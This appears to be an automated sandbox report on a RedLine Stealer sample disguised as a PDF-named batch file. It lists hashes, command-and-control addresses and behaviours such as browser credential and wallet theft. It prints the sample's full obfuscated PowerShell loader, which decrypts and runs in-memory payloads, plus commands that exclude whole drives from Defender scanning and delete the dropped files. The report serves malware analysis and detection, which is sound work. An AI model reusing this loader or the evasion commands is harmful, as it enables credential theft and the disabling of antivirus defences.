Analysis

  • max time kernel
    142s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20230915-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20230915-enlocale:en-usos:windows10-2004-x64system
  • submitted
    17/09/2023, 18:21

General

  • Target

    installment-papers-𝘱𝘥𝘧.bat

  • Size

    393KB

  • MD5

    b4c53eb42fac3e0c8770a4704171cfb6

  • SHA1

    84d6767c85019aebb3a69f7e91122b849a7920d4

  • SHA256

    f4f093e1c950a233464a6a17a2040630c9e4f69b282f4a34510b3de35d5723b0

  • SHA512

    28ce60729339301a9d2f2795bce4624480e9704102944d55efaff0e8a6c2448d83809e397fa4385304fc7d7f21041dee45614dddfcdb088c27289d75d1082b30

  • SSDEEP

    12288:BC2EeON/+rF+B2Oifb0FfNGIklldsk2zdoBgT0eOTXzRlQk:Bi4Y2nfwHklldskOdsd5lQk

Malware Config

Extracted

Family

redline

Botnet

A1

C2

80.85.152.191:27465

Attributes
  • auth_value

    a131e3b093780cde0c92d305bfc047cd

Extracted

Family

redline

Botnet

1

C2

192.248.145.110:2206

Attributes
  • auth_value

    ab3016ff00d136f88ba093ed5c03f62c

Signatures

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 2 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Suspicious behavior: EnumeratesProcesses 22 IoCs
  • Suspicious use of AdjustPrivilegeToken 27 IoCs
  • Suspicious use of WriteProcessMemory 20 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\installment-papers-𝘱𝘥𝘧.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4572
    • C:\Windows\system32\cmd.exe
      C:\Windows\system32\cmd.exe /K C:\Users\Admin\AppData\Local\Temp\installment-papers-𝘱𝘥𝘧.bat
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:732
      • C:\Users\Admin\AppData\Local\Temp\installment-papers-𝘱𝘥𝘧.bat.exe
        "C:\Users\Admin\AppData\Local\Temp\installment-papers-𝘱𝘥𝘧.bat.exe" -w hidden -c $fiYc='InvIdTrokeIdTr'.Replace('IdTr', ''),'ReasSQqdLisSQqnsSQqessSQq'.Replace('sSQq', ''),'MaZWebinZWebMZWebodZWebulZWebeZWeb'.Replace('ZWeb', ''),'SpNijqlNijqiNijqtNijq'.Replace('Nijq', ''),'GeRsnHtCRsnHurRsnHreRsnHntPRsnHroRsnHceRsnHssRsnH'.Replace('RsnH', ''),'ChulgPanulgPgeulgPExtulgPenulgPsulgPioulgPnulgP'.Replace('ulgP', ''),'CNdQxopNdQxyTNdQxoNdQx'.Replace('NdQx', ''),'LoSakmaSakmdSakm'.Replace('Sakm', ''),'DRvNceRvNccoRvNcmprRvNceRvNcssRvNc'.Replace('RvNc', ''),'TraGupOnsGupOfGupOorGupOmFGupOinaGupOlBGupOlGupOockGupO'.Replace('GupO', ''),'EntKzIvrKzIvyKzIvPKzIvoinKzIvtKzIv'.Replace('KzIv', ''),'ElvStpemevStpntvStpAtvStp'.Replace('vStp', ''),'FQSCNroQSCNmQSCNBaQSCNsQSCNe64QSCNStQSCNriQSCNngQSCN'.Replace('QSCN', ''),'CCoXjreCoXjateCoXjDeCoXjcCoXjrCoXjyptCoXjorCoXj'.Replace('CoXj', '');function gfsgW($gBVtE){$APtTz=[System.Security.Cryptography.Aes]::Create();$APtTz.Mode=[System.Security.Cryptography.CipherMode]::CBC;$APtTz.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7;$APtTz.Key=[System.Convert]::($fiYc[12])('l8TLRffC3gyiX9d1iOUDrM62nEWIszmOsSg9w1yg6IQ=');$APtTz.IV=[System.Convert]::($fiYc[12])('cVpCMuhwIpdiDX+Lhb7sAw==');$zMzHi=$APtTz.($fiYc[13])();$OtZqQ=$zMzHi.($fiYc[9])($gBVtE,0,$gBVtE.Length);$zMzHi.Dispose();$APtTz.Dispose();$OtZqQ;}function baCSB($gBVtE){$Iblbv=New-Object System.IO.MemoryStream(,$gBVtE);$jRJid=New-Object System.IO.MemoryStream;$WtUlw=New-Object System.IO.Compression.GZipStream($Iblbv,[IO.Compression.CompressionMode]::($fiYc[8]));$WtUlw.($fiYc[6])($jRJid);$WtUlw.Dispose();$Iblbv.Dispose();$jRJid.Dispose();$jRJid.ToArray();}$gajzd=[System.Linq.Enumerable]::($fiYc[11])([System.IO.File]::($fiYc[1])([System.IO.Path]::($fiYc[5])([System.Diagnostics.Process]::($fiYc[4])().($fiYc[2]).FileName, $null)), 1);$Ckhah=$gajzd.Substring(2).($fiYc[3])(':');$ixOPC=baCSB (gfsgW ([Convert]::($fiYc[12])($Ckhah[0])));$NYMJk=baCSB (gfsgW ([Convert]::($fiYc[12])($Ckhah[1])));[System.Reflection.Assembly]::($fiYc[7])([byte[]]$NYMJk).($fiYc[10]).($fiYc[0])($null,$null);[System.Reflection.Assembly]::($fiYc[7])([byte[]]$ixOPC).($fiYc[10]).($fiYc[0])($null,$null);
        3⤵
        • Checks computer location settings
        • Executes dropped EXE
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        • Suspicious use of WriteProcessMemory
        PID:964
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(964);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2620
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" add-mppreference -exclusionpath @('C:\','D:\','F:\')
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4884
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "powershell.exe" [Console]::Title = ((Get-ScheduledTask).Actions.Execute -join '').Contains('C:\Users\Admin\AppData\Local\Temp\installment-papers-𝘱𝘥𝘧')
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2248
        • C:\Users\Admin\AppData\Local\Temp\A1.exe
          "C:\Users\Admin\AppData\Local\Temp\A1.exe"
          4⤵
          • Executes dropped EXE
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:2948
        • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
          "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $a = [System.Diagnostics.Process]::GetProcessById(2948);$b = $a.MainModule.FileName;$a.WaitForExit();Remove-Item -Force -Path $b;
          4⤵
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of AdjustPrivilegeToken
          PID:4004

Network

MITRE ATT&CK Enterprise v15

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log

    Filesize

    2KB

    MD5

    3d086a433708053f9bf9523e1d87a4e8

    SHA1

    b3ab5d4f282a4c8fe8c3005b8a557ed5a0e37f28

    SHA256

    6f8fd1b8d9788ad54eaeee329232187e24b7b43393a01aeba2d6e9675231fb69

    SHA512

    931ae42b4c68a4507ff2342332b08eb407050d47cf4176137ea022d0f6e513c689e998445a04c6d18d4877391705c586bfce0234632b898d41aaed0957996dfd

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

    Filesize

    53KB

    MD5

    06ad34f9739c5159b4d92d702545bd49

    SHA1

    9152a0d4f153f3f40f7e606be75f81b582ee0c17

    SHA256

    474813b625f00710f29fa3b488235a6a22201851efb336bddf60d7d24a66bfba

    SHA512

    c272cd28ae164d465b779163ba9eca6a28261376414c6bbdfbd9f2128adb7f7ff1420e536b4d6000d0301ded2ec9036bc5c657588458bff41f176bdce8d74f92

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    18KB

    MD5

    e3e8b83799cdd924a022b8ee078e7506

    SHA1

    d6caebe1ea467e53744be77a01d5d9798dfc7086

    SHA256

    6485999bb7c6a02f2f4b61caab36517488d41293295405c648d49d112cdc7730

    SHA512

    c6b693f21494f0cafa8a260eb2d0bb4088c6a33b2fc8888c54a452720ca36e08013148445ff43716dc96ef1091f96094155575975a9b6784917b5c85c618ec33

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    20KB

    MD5

    bb6b42409dbc119cb40b0253da1ea674

    SHA1

    aa96aaed16c88f41770874dadbe686004c7b6fb3

    SHA256

    a5d13c9d60ebee8f9df0203833fdc69fc176a45709ca160f56f30e4d1f1a56c9

    SHA512

    0f9b3a00d3bedc57699a6396ff084ffbd69c7dd78a796b244504a75cae42cc04629573d1903114cc8eff2c8bc3997efe992b43c70a9a76a6e2b5b0b3d85cd6b6

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    15KB

    MD5

    3400b4e119ba51eaefc70da00254ae76

    SHA1

    45a94271cce89612e2e132d351a1210a970b581c

    SHA256

    5654fde7225d8a32f041ebad578f44dc492f6a4530070596091292f973f504b6

    SHA512

    84136ecdfb59113fd734bf934785d14524f3d7454c13cb1edf9c67935a77beaa3df6ee6b2dc1207232ae414cfe14124f203c7850cf0ea1d8eb11fbe44cf2824e

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

    Filesize

    15KB

    MD5

    a97a2f804df68771ee3ea9d385e6663c

    SHA1

    3533e6373882fc319579da5bdd0ce3207e96f615

    SHA256

    2ef95e532bdecb8dc69c867a32ea40fa1af2ec8922be322b55f9541a29ea54e6

    SHA512

    428fa6fc83a60ebad9709ab616e95da9f30bc2e3a8356f1094340f01a84c1a27eb331b5c046b2ff5fdfada59f61b233b205c7bf34726bf6fa061a04235a371dd

  • C:\Users\Admin\AppData\Local\Temp\A1.exe

    Filesize

    174KB

    MD5

    28caece68c96bec864c5b61d09a8ad06

    SHA1

    a211e5db983c0ceb6b90465a76a780fa0884ff5d

    SHA256

    197b50f15375335928e08c5cc5b6f50cd93864655237b8db85556d4057f3b988

    SHA512

    5d2a62cc84ddcd339c641e8e668015183ab2238bb88bb7fa656ad92d2232a4011448a052813eb8bb4144cb694709ce71f308f0aa6ec6b0ce28986da159bcbc84

  • C:\Users\Admin\AppData\Local\Temp\A1.exe

    Filesize

    174KB

    MD5

    28caece68c96bec864c5b61d09a8ad06

    SHA1

    a211e5db983c0ceb6b90465a76a780fa0884ff5d

    SHA256

    197b50f15375335928e08c5cc5b6f50cd93864655237b8db85556d4057f3b988

    SHA512

    5d2a62cc84ddcd339c641e8e668015183ab2238bb88bb7fa656ad92d2232a4011448a052813eb8bb4144cb694709ce71f308f0aa6ec6b0ce28986da159bcbc84

  • C:\Users\Admin\AppData\Local\Temp\A1.exe

    Filesize

    174KB

    MD5

    28caece68c96bec864c5b61d09a8ad06

    SHA1

    a211e5db983c0ceb6b90465a76a780fa0884ff5d

    SHA256

    197b50f15375335928e08c5cc5b6f50cd93864655237b8db85556d4057f3b988

    SHA512

    5d2a62cc84ddcd339c641e8e668015183ab2238bb88bb7fa656ad92d2232a4011448a052813eb8bb4144cb694709ce71f308f0aa6ec6b0ce28986da159bcbc84

  • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w5u5xssy.zmu.ps1

    Filesize

    60B

    MD5

    d17fe0a3f47be24a6453e9ef58c94641

    SHA1

    6ab83620379fc69f80c0242105ddffd7d98d5d9d

    SHA256

    96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

    SHA512

    5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

  • C:\Users\Admin\AppData\Local\Temp\installment-papers-𝘱𝘥𝘧.bat.exe

    Filesize

    423KB

    MD5

    c32ca4acfcc635ec1ea6ed8a34df5fac

    SHA1

    f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

    SHA256

    73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

    SHA512

    6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

  • C:\Users\Admin\AppData\Local\Temp\installment-papers-𝘱𝘥𝘧.bat.exe

    Filesize

    423KB

    MD5

    c32ca4acfcc635ec1ea6ed8a34df5fac

    SHA1

    f5ee89bb1e4a0b1c3c7f1e8d05d0677f2b2b5919

    SHA256

    73a3c4aef5de385875339fc2eb7e58a9e8a47b6161bdc6436bf78a763537be70

    SHA512

    6e43dca1b92faace0c910cbf9308cf082a38dd39da32375fad72d6517dea93e944b5e5464cf3c69a61eabf47b2a3e5aa014d6f24efa1a379d4c81c32fa39ddbc

  • memory/964-127-0x0000000007B20000-0x0000000007B52000-memory.dmp

    Filesize

    200KB

  • memory/964-7-0x0000000004FD0000-0x0000000004FE0000-memory.dmp

    Filesize

    64KB

  • memory/964-25-0x0000000007D30000-0x00000000083AA000-memory.dmp

    Filesize

    6.5MB

  • memory/964-26-0x0000000006910000-0x000000000692A000-memory.dmp

    Filesize

    104KB

  • memory/964-27-0x0000000001100000-0x000000000110E000-memory.dmp

    Filesize

    56KB

  • memory/964-29-0x0000000077361000-0x0000000077481000-memory.dmp

    Filesize

    1.1MB

  • memory/964-30-0x0000000007860000-0x00000000078AE000-memory.dmp

    Filesize

    312KB

  • memory/964-23-0x00000000063A0000-0x00000000063EC000-memory.dmp

    Filesize

    304KB

  • memory/964-32-0x0000000074940000-0x00000000750F0000-memory.dmp

    Filesize

    7.7MB

  • memory/964-22-0x0000000006370000-0x000000000638E000-memory.dmp

    Filesize

    120KB

  • memory/964-4-0x0000000074940000-0x00000000750F0000-memory.dmp

    Filesize

    7.7MB

  • memory/964-5-0x0000000004EC0000-0x0000000004EF6000-memory.dmp

    Filesize

    216KB

  • memory/964-81-0x0000000077361000-0x0000000077481000-memory.dmp

    Filesize

    1.1MB

  • memory/964-6-0x0000000004FD0000-0x0000000004FE0000-memory.dmp

    Filesize

    64KB

  • memory/964-56-0x0000000004FD0000-0x0000000004FE0000-memory.dmp

    Filesize

    64KB

  • memory/964-57-0x0000000004FD0000-0x0000000004FE0000-memory.dmp

    Filesize

    64KB

  • memory/964-151-0x00000000105A0000-0x0000000010B44000-memory.dmp

    Filesize

    5.6MB

  • memory/964-150-0x000000000F6D0000-0x000000000F762000-memory.dmp

    Filesize

    584KB

  • memory/964-149-0x000000000F5B0000-0x000000000F626000-memory.dmp

    Filesize

    472KB

  • memory/964-21-0x0000000005EA0000-0x00000000061F4000-memory.dmp

    Filesize

    3.3MB

  • memory/964-142-0x0000000007C60000-0x0000000007C72000-memory.dmp

    Filesize

    72KB

  • memory/964-129-0x0000000007570000-0x0000000007576000-memory.dmp

    Filesize

    24KB

  • memory/964-8-0x0000000005610000-0x0000000005C38000-memory.dmp

    Filesize

    6.2MB

  • memory/964-74-0x0000000004FD0000-0x0000000004FE0000-memory.dmp

    Filesize

    64KB

  • memory/964-24-0x0000000004FD0000-0x0000000004FE0000-memory.dmp

    Filesize

    64KB

  • memory/964-9-0x00000000054A0000-0x00000000054C2000-memory.dmp

    Filesize

    136KB

  • memory/964-10-0x0000000005540000-0x00000000055A6000-memory.dmp

    Filesize

    408KB

  • memory/964-11-0x0000000005D30000-0x0000000005D96000-memory.dmp

    Filesize

    408KB

  • memory/2248-113-0x0000000074940000-0x00000000750F0000-memory.dmp

    Filesize

    7.7MB

  • memory/2248-102-0x0000000070760000-0x00000000707AC000-memory.dmp

    Filesize

    304KB

  • memory/2248-101-0x000000007F370000-0x000000007F380000-memory.dmp

    Filesize

    64KB

  • memory/2248-86-0x0000000074940000-0x00000000750F0000-memory.dmp

    Filesize

    7.7MB

  • memory/2248-89-0x00000000048B0000-0x00000000048C0000-memory.dmp

    Filesize

    64KB

  • memory/2248-87-0x00000000048B0000-0x00000000048C0000-memory.dmp

    Filesize

    64KB

  • memory/2620-36-0x0000000004A50000-0x0000000004A60000-memory.dmp

    Filesize

    64KB

  • memory/2620-33-0x0000000074940000-0x00000000750F0000-memory.dmp

    Filesize

    7.7MB

  • memory/2620-88-0x0000000074940000-0x00000000750F0000-memory.dmp

    Filesize

    7.7MB

  • memory/2620-99-0x0000000004A50000-0x0000000004A60000-memory.dmp

    Filesize

    64KB

  • memory/2948-128-0x00000000005E0000-0x0000000000610000-memory.dmp

    Filesize

    192KB

  • memory/2948-130-0x0000000074940000-0x00000000750F0000-memory.dmp

    Filesize

    7.7MB

  • memory/2948-143-0x0000000005DC0000-0x0000000005DFC000-memory.dmp

    Filesize

    240KB

  • memory/2948-136-0x0000000005C70000-0x0000000005D7A000-memory.dmp

    Filesize

    1.0MB

  • memory/2948-135-0x0000000006090000-0x00000000066A8000-memory.dmp

    Filesize

    6.1MB

  • memory/2948-131-0x0000000002740000-0x0000000002746000-memory.dmp

    Filesize

    24KB

  • memory/4004-134-0x0000000003160000-0x0000000003170000-memory.dmp

    Filesize

    64KB

  • memory/4004-133-0x0000000003160000-0x0000000003170000-memory.dmp

    Filesize

    64KB

  • memory/4004-132-0x0000000074940000-0x00000000750F0000-memory.dmp

    Filesize

    7.7MB

  • memory/4884-75-0x0000000007830000-0x00000000078C6000-memory.dmp

    Filesize

    600KB

  • memory/4884-80-0x00000000078D0000-0x00000000078D8000-memory.dmp

    Filesize

    32KB

  • memory/4884-73-0x0000000007620000-0x000000000762A000-memory.dmp

    Filesize

    40KB

  • memory/4884-84-0x0000000074940000-0x00000000750F0000-memory.dmp

    Filesize

    7.7MB

  • memory/4884-76-0x00000000077B0000-0x00000000077C1000-memory.dmp

    Filesize

    68KB

  • memory/4884-77-0x00000000077E0000-0x00000000077EE000-memory.dmp

    Filesize

    56KB

  • memory/4884-78-0x00000000077F0000-0x0000000007804000-memory.dmp

    Filesize

    80KB

  • memory/4884-71-0x0000000007450000-0x000000000746E000-memory.dmp

    Filesize

    120KB

  • memory/4884-79-0x00000000078F0000-0x000000000790A000-memory.dmp

    Filesize

    104KB

  • memory/4884-72-0x0000000007480000-0x0000000007523000-memory.dmp

    Filesize

    652KB

  • memory/4884-61-0x0000000070760000-0x00000000707AC000-memory.dmp

    Filesize

    304KB

  • memory/4884-60-0x0000000006860000-0x0000000006892000-memory.dmp

    Filesize

    200KB

  • memory/4884-59-0x000000007EF10000-0x000000007EF20000-memory.dmp

    Filesize

    64KB

  • memory/4884-58-0x0000000004FE0000-0x0000000004FF0000-memory.dmp

    Filesize

    64KB

  • memory/4884-46-0x0000000074940000-0x00000000750F0000-memory.dmp

    Filesize

    7.7MB

  • memory/4884-35-0x0000000004FE0000-0x0000000004FF0000-memory.dmp

    Filesize

    64KB

  • memory/4884-34-0x0000000004FE0000-0x0000000004FF0000-memory.dmp

    Filesize

    64KB